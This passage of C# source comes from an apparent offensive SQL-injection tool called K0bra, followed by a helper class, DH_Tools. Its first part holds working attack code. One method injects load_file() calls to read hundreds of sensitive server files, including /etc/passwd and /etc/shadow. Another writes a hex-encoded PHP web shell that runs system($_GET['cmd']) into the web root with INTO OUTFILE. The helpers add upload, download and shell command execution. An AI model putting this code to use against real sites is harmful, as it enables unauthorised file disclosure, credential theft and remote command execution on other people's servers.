            response = regex.Groups[1].Value;
        }
        return response;
    }

    // Tries load_file() on every path in the built-in list (OS, web-server,
    // PHP, MySQL, FTP and mail configuration/log files) and returns the ones
    // whose response carries the "ERTOR854" marker. One HTTP request per
    // entry, several hundred per run -- a loud, easily detected pattern.
    // The "(.*)hackman(.*)" split of url is loop-invariant but re-evaluated
    // per iteration; the list contains "C:/xampp/htdocs/aca.txt" twice.
    public List<String> fuzz_files()
    {
        string url = target;
        string urlgen = "";
        string code = "";
List<string> rutas = new List<string> { "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", "/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", 
"/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", 
"/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", "/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", 
"C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", "/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", "/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", "/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog" };
        List<string> archivos = new List<string>();
        foreach (string ruta in rutas)
        {
            Match regex = Regex.Match(url, "(.*)hackman(.*)", RegexOptions.IgnoreCase);
            if (regex.Success)
            {
                urlgen = regex.Groups[1].Value + "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + hexencode(ruta) + "),char(69,82,84,79,82,56,53,52))))" + regex.Groups[2].Value;
                code = toma(urlgen);
                regex = Regex.Match(code, "ERTOR854", RegexOptions.IgnoreCase);
                if (regex.Success)
                {
                    archivos.Add(ruta);
                }
            }
        }
        return archivos;
    }

    // Writes a hex-encoded PHP script (`linea`; its <title> is "Mini Shell By
    // Doddy", which is what the regex below looks for) to "<full>/cmd.php" with
    // SELECT ... INTO OUTFILE, then fetches "http://<host><dir>/cmd.php" (the
    // scheme is hard-coded to http). Returns that URL on success, "Error"
    // otherwise. The result of toma(formandoweb) is discarded, so a failed
    // write is only noticed by the follow-up GET. Succeeds only with the FILE
    // privilege and a web root writable by the mysqld user; a cmd.php created
    // by mysqld, or a page carrying that title string, is a clean detection.
    public string make_shell(string full, string dir)
    {
        string url = target;
        string code = "";
        string response = "";
        string linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e";
        string lugar = full + "/cmd.php";
        string lugardos = dir + "/cmd.php";
        DH_Tools tools = new DH_Tools();
        string host = tools.urisplit(url, "host");
        string webtest = "http://" + host + lugardos;
        string web1 = url.Replace("hackman", linea);
        string formandoweb = web1 + bypass1 + "into" + bypass1 + "outfile" + bypass1 + "'" + lugar + "'" + bypass2;
        toma(formandoweb);
        code = toma(webtest);
        Match regex = Regex.Match(code, "Mini Shell By Doddy", RegexOptions.IgnoreCase);
        if (regex.Success)
        {
            response = webtest;
        }
        else
        {
            response = "Error";
        }
        return response;
    }

    // HTTP GET with a fixed, browser-looking User-Agent (a stable signature for
    // this tool's traffic). Every exception -- bad URI, DNS, timeout, non-2xx
    // status -- is swallowed and "" is returned, so callers cannot tell an
    // empty body from a failed request.
    public string toma(string url)
    {
        string code = "";
        try
        {
            WebClient nave = new WebClient();
            nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
            code = nave.DownloadString(url);
        }
        catch
        {
            //
        }
        return code;
    }

    // Returns "0x" + upper-case hex of the bytes of `texto`, a MySQL hex
    // literal that needs no quotes. Encoding.Default is platform-dependent
    // (ANSI code page on .NET Framework, UTF-8 on .NET Core), so non-ASCII
    // input may encode differently across runtimes.
    public string hexencode(string texto)
    {
        string resultado = "";
        byte[] enc = Encoding.Default.GetBytes(texto);
        resultado = BitConverter.ToString(enc);
        resultado = resultado.Replace("-", "");
        return "0x" + resultado;
    }
}
}
// The End ?
// Class Name : DH Tools
// Version : Beta
// Author : Doddy Hackman
// (C) Doddy Hackman 2014
//
// Functions :
//
// [+] HTTP Methods GET & POST
// [+] Get HTTP Status code number
// [+] HTTP FingerPrinting
// [+] Read File
// [+] Write File
// [+] GET OS
// [+] Remove duplicates from a List
// [+] Cut urls from a List
// [+] Download
// [+] Upload
// [+] Get Basename from a path
// [+] Execute commands
// [+] URI Split
// [+] MD5 Hash Generator
// [+] Get MD5 of file
// [+] Get IP address from host name
//
// Credits :
//
// Method POST -> https://technet.rapaport.com/Info/Prices/SampleCode/Full_Example.aspx
// Method GET -> http://stackoverflow.com/questions/4510212/how-i-can-get-web-pages-content-and-save-it-into-the-string-variable
// HTTP Headers -> http://msdn.microsoft.com/en-us/library/system.net.httpwebresponse.headers%28v=vs.110%29.aspx
// List Cleaner -> http://forums.asp.net/t/1318899.aspx?Remove+duplicate+items+from+List+String+
// Execute command -> http://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C
// MD5 Hash Generator -> http://www.java2s.com/Code/CSharp/Security/GetandverifyMD5Hash.htm
// Get MD5 of file -> http://stackoverflow.com/questions/10520048/calculate-md5-checksum-for-a-file
//
// Thanks to : $DoC and atheros14 (Forum indetectables)
//
using System;
using System.Collections.Generic;
using System.Text;
using System.Net;
using System.IO;
using System.Text.RegularExpressions;
using System.Security.Cryptography;
namespace K0bra
{
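/// <summary>
/// Small grab-bag of helpers used by the rest of the project: HTTP GET/POST, status code and
/// header retrieval, file read/append, list de-duplication and URL trimming, download/upload,
/// command execution, URI splitting, MD5 checksums and DNS lookup.
/// Every network/file helper is best-effort: failures are swallowed and reported through the
/// return value ("" or "Error") rather than exceptions, as in the original.
/// </summary>
class DH_Tools
{
    // Browser-like User-Agent sent by every HTTP helper (the original repeated this literal per method).
    private const string UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";

    // Pattern used by cortar(): greedy groups, so for "a?b=1&c=2" group 2 is "b=1&c" (kept from the original).
    private static readonly Regex QueryCutter = new Regex(@"(.*)\?(.*)=(.*)", RegexOptions.IgnoreCase);

    /// <summary>HTTP GET: returns the body of <paramref name="url"/>.</summary>
    /// <param name="url">Absolute URL to request.</param>
    /// <returns>The response body, or "" on any failure.</returns>
    public string toma(string url)
    {
        string code = "";
        try
        {
            // WebClient is IDisposable; disposing releases the underlying connection objects.
            using (WebClient nave = new WebClient())
            {
                nave.Headers["User-Agent"] = UserAgent;
                code = nave.DownloadString(url);
            }
        }
        catch
        {
            // Best-effort: any network, DNS or HTTP error yields "".
        }
        return code;
    }

    /// <summary>HTTP POST of a form-encoded body to <paramref name="url"/>.</summary>
    /// <param name="url">Absolute URL to post to.</param>
    /// <param name="par">Already form-encoded body ("a=1&amp;b=2"); encoded as ASCII, so non-ASCII characters become '?'.</param>
    /// <returns>The response body, or "" on any failure.</returns>
    public string tomar(string url, string par)
    {
        string code = "";
        try
        {
            HttpWebRequest nave = (HttpWebRequest)WebRequest.Create(url);
            nave.UserAgent = UserAgent;
            nave.Method = "POST";
            nave.ContentType = "application/x-www-form-urlencoded";

            // Encode once (the original called GetBytes twice for the same string).
            byte[] body = Encoding.ASCII.GetBytes(par);
            using (Stream requestStream = nave.GetRequestStream())
            {
                requestStream.Write(body, 0, body.Length);
            }

            // Response and reader were never closed in the original; the using blocks fix the leak.
            using (WebResponse respuesta = nave.GetResponse())
            using (StreamReader lector = new StreamReader(respuesta.GetResponseStream()))
            {
                code = lector.ReadToEnd();
            }
        }
        catch
        {
            // Best-effort: any failure yields "".
        }
        return code;
    }

    /// <summary>Returns the HTTP status code of a GET to <paramref name="url"/> as a decimal string.</summary>
    /// <param name="url">Absolute URL to request.</param>
    /// <returns>
    /// The numeric status (e.g. "200", "403", "500"). When no HTTP response exists at all
    /// (DNS failure, timeout, connection refused, bad URL) the original fallback "404" is returned.
    /// </returns>
    public string respondecode(string url)
    {
        string code = "";
        try
        {
            HttpWebRequest nave = (HttpWebRequest)WebRequest.Create(url);
            nave.UserAgent = UserAgent;
            using (HttpWebResponse num = (HttpWebResponse)nave.GetResponse())
            {
                code = Convert.ToString((int)num.StatusCode);
            }
        }
        catch (WebException ex)
        {
            // GetResponse() throws for 4xx/5xx, but the real status is still attached to the
            // exception; the original reported every such case as "404".
            HttpWebResponse fallida = ex.Response as HttpWebResponse;
            if (fallida != null)
            {
                using (fallida)
                {
                    code = Convert.ToString((int)fallida.StatusCode);
                }
            }
            else
            {
                code = "404";
            }
        }
        catch
        {
            code = "404";
        }
        return code;
    }

    /// <summary>Lists the response headers of a GET to <paramref name="url"/>, one "[+] Name:Value" per line.</summary>
    /// <param name="url">Absolute URL to request.</param>
    /// <returns>The formatted header list; "" when no response could be obtained.</returns>
    public string httpfinger(string url)
    {
        StringBuilder code = new StringBuilder();
        try
        {
            HttpWebRequest nave1 = (HttpWebRequest)WebRequest.Create(url);
            using (HttpWebResponse nave2 = (HttpWebResponse)nave1.GetResponse())
            {
                AppendHeaders(code, nave2);
            }
        }
        catch (WebException ex)
        {
            // A 4xx/5xx answer still carries headers worth listing; the original returned "" for it.
            HttpWebResponse fallida = ex.Response as HttpWebResponse;
            if (fallida != null)
            {
                using (fallida)
                {
                    AppendHeaders(code, fallida);
                }
            }
        }
        catch
        {
            // Best-effort: whatever was collected so far is returned.
        }
        return code.ToString();
    }

    // Appends every header of respuesta to destino in the "[+] Name:Value" + newline format.
    private static void AppendHeaders(StringBuilder destino, HttpWebResponse respuesta)
    {
        for (int num = 0; num < respuesta.Headers.Count; ++num)
        {
            destino.Append("[+] ")
                   .Append(respuesta.Headers.Keys[num])
                   .Append(":")
                   .Append(respuesta.Headers[num])
                   .Append(Environment.NewLine);
        }
    }

    /// <summary>Reads a whole text file.</summary>
    /// <param name="file">Path of the file to read.</param>
    /// <returns>The file contents, or "" if it cannot be read.</returns>
    public string openword(string file)
    {
        string code = "";
        try
        {
            code = File.ReadAllText(file);
        }
        catch
        {
            // Best-effort: unreadable/missing file yields "".
        }
        return code;
    }

    /// <summary>Appends <paramref name="texto"/> to <paramref name="file"/>, creating it if needed.</summary>
    /// <param name="file">Path of the file to append to.</param>
    /// <param name="texto">Text to append (no newline is added).</param>
    public void savefile(string file, string texto)
    {
        try
        {
            // Equivalent to the original StreamWriter(file, append: true) but always closes the handle.
            File.AppendAllText(file, texto);
        }
        catch
        {
            // Best-effort: write failures are ignored.
        }
    }

    /// <summary>Describes the local operating system.</summary>
    /// <returns>Environment.OSVersion as a string, or "?" if it cannot be read.</returns>
    public string getos()
    {
        string code = "";
        try
        {
            code = Convert.ToString(Environment.OSVersion);
        }
        catch
        {
            code = "?";
        }
        return code;
    }

    /// <summary>Removes duplicate entries from a list, keeping the first occurrence and the original order.</summary>
    /// <param name="array">Input list; null is treated as empty.</param>
    /// <returns>A new list without duplicates (ordinal string comparison).</returns>
    public List<string> repes(List<string> array)
    {
        List<string> repe = new List<string>();
        if (array == null)
        {
            return repe;
        }
        // HashSet gives O(1) membership; the original used List.Contains, O(n) per element.
        HashSet<string> vistos = new HashSet<string>();
        foreach (string lin in array)
        {
            if (vistos.Add(lin))
            {
                repe.Add(lin);
            }
        }
        return repe;
    }

    /// <summary>
    /// Trims each URL of the form "base?param=value" down to "base?param=", dropping entries that have no
    /// "?...=" part. Matching is greedy, so "a?b=1&amp;c=2" becomes "a?b=1&amp;c=".
    /// </summary>
    /// <param name="otroarray">Input URLs; null is treated as empty.</param>
    /// <returns>A new list with the trimmed URLs.</returns>
    public List<string> cortar(List<string> otroarray)
    {
        List<string> cort = new List<string>();
        if (otroarray == null)
        {
            return cort;
        }
        foreach (string row in otroarray)
        {
            Match regex = QueryCutter.Match(row);
            if (regex.Success)
            {
                cort.Add(regex.Groups[1].Value + "?" + regex.Groups[2].Value + "=");
            }
        }
        return cort;
    }

    /// <summary>Downloads <paramref name="url"/> to the local path <paramref name="savename"/>.</summary>
    /// <param name="url">Absolute URL to download.</param>
    /// <param name="savename">Destination path; overwritten if it exists.</param>
    /// <returns>"OK" on success, "Error" otherwise.</returns>
    public string download(string url, string savename)
    {
        string code = "";
        try
        {
            using (WebClient nave = new WebClient())
            {
                nave.Headers["User-Agent"] = UserAgent;
                nave.DownloadFile(url, savename);
            }
            code = "OK";
        }
        catch
        {
            code = "Error";
        }
        return code;
    }

    /// <summary>Uploads the local file <paramref name="archivo"/> to <paramref name="link"/> with a multipart POST.</summary>
    /// <param name="link">Absolute URL that accepts the upload.</param>
    /// <param name="archivo">Path of the local file to send.</param>
    /// <returns>The server's response body decoded as UTF-8, or "Error" on failure.</returns>
    public string upload(string link, string archivo)
    {
        string code = "";
        try
        {
            using (WebClient nave = new WebClient())
            {
                nave.Headers["User-Agent"] = UserAgent;
                byte[] codedos = nave.UploadFile(link, "POST", archivo);
                code = Encoding.UTF8.GetString(codedos, 0, codedos.Length);
            }
        }
        catch
        {
            code = "Error";
        }
        return code;
    }

    /// <summary>Returns the file-name part of a path.</summary>
    /// <param name="file">A path such as "/dir/sub/name.ext".</param>
    /// <returns>"name.ext"; "" when the path has no file-name part.</returns>
    public string basename(string file)
    {
        // Path.GetFileName is pure string work: unlike FileInfo it does not validate or touch the file system.
        return Path.GetFileName(file);
    }

    /// <summary>
    /// Runs <paramref name="cmd"/> through "cmd /c" and captures its standard output.
    /// The command string is passed to the shell verbatim (no quoting or escaping), so the caller
    /// fully controls what is executed; stderr is not captured.
    /// </summary>
    /// <param name="cmd">Command line as the shell should see it.</param>
    /// <returns>Captured standard output, or "Error" if the process could not be started.</returns>
    public string console(string cmd)
    {
        string code = "";
        try
        {
            System.Diagnostics.ProcessStartInfo loadnow = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd);
            loadnow.RedirectStandardOutput = true;
            loadnow.UseShellExecute = false;
            loadnow.CreateNoWindow = true;
            // The Process handle was never disposed in the original.
            using (System.Diagnostics.Process loadnownow = System.Diagnostics.Process.Start(loadnow))
            {
                code = loadnownow.StandardOutput.ReadToEnd();
                loadnownow.WaitForExit();
            }
        }
        catch
        {
            code = "Error";
        }
        return code;
    }

    /// <summary>Extracts one component of an absolute URL.</summary>
    /// <param name="url">Absolute URL; an invalid one makes the Uri constructor throw UriFormatException, as before.</param>
    /// <param name="opcion">"host", "port", "path", "file" or "query".</param>
    /// <returns>
    /// The requested component; "Error" for an empty option; "" for an unrecognised option
    /// (the asymmetry between "" and "Error" is kept from the original for callers that test either).
    /// </returns>
    public string urisplit(string url, string opcion)
    {
        Uri dividir = new Uri(url);
        switch (opcion)
        {
            case "host":
                return dividir.Host;
            case "port":
                return Convert.ToString(dividir.Port);
            case "path":
                return dividir.LocalPath;
            case "file":
                return Path.GetFileName(dividir.AbsolutePath);
            case "query":
                return dividir.Query;
            case "":
                return "Error";
            default:
                return "";
        }
    }

    /// <summary>
    /// Lower-case hex MD5 of <paramref name="text"/> (bytes from Encoding.Default). Suitable as a
    /// checksum/identifier only; MD5 is not collision resistant.
    /// </summary>
    /// <param name="text">Text to hash.</param>
    /// <returns>32 lower-case hex characters.</returns>
    public string convertir_md5(string text)
    {
        using (MD5 convertirmd5 = MD5.Create())
        {
            byte[] infovalor = convertirmd5.ComputeHash(Encoding.Default.GetBytes(text));
            StringBuilder guardar = new StringBuilder(infovalor.Length * 2);
            foreach (byte b in infovalor)
            {
                guardar.Append(b.ToString("x2"));
            }
            return guardar.ToString();
        }
    }

    /// <summary>Lower-case hex MD5 of a file's contents.</summary>
    /// <param name="file">Path of the file to hash.</param>
    /// <returns>32 lower-case hex characters, or "Error" if the file cannot be read.</returns>
    public string md5file(string file)
    {
        string code = "";
        try
        {
            // Both the hasher and the FileStream were leaked in the original (the file stayed open until GC).
            using (MD5 gen = MD5.Create())
            using (FileStream ar = File.OpenRead(file))
            {
                code = BitConverter.ToString(gen.ComputeHash(ar)).Replace("-", "").ToLower();
            }
        }
        catch
        {
            code = "Error";
        }
        return code;
    }

    /// <summary>Resolves a host name to its first IP address.</summary>
    /// <param name="host">Host name (or literal address) to resolve.</param>
    /// <returns>The first address as a string, or "Error" if resolution fails or returns nothing.</returns>
    public string getip(string host)
    {
        string code = "";
        try
        {
            IPAddress[] find = Dns.GetHostAddresses(host);
            code = find[0].ToString();
        }
        catch
        {
            code = "Error";
        }
        return code;
    }
}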
}
// The End ?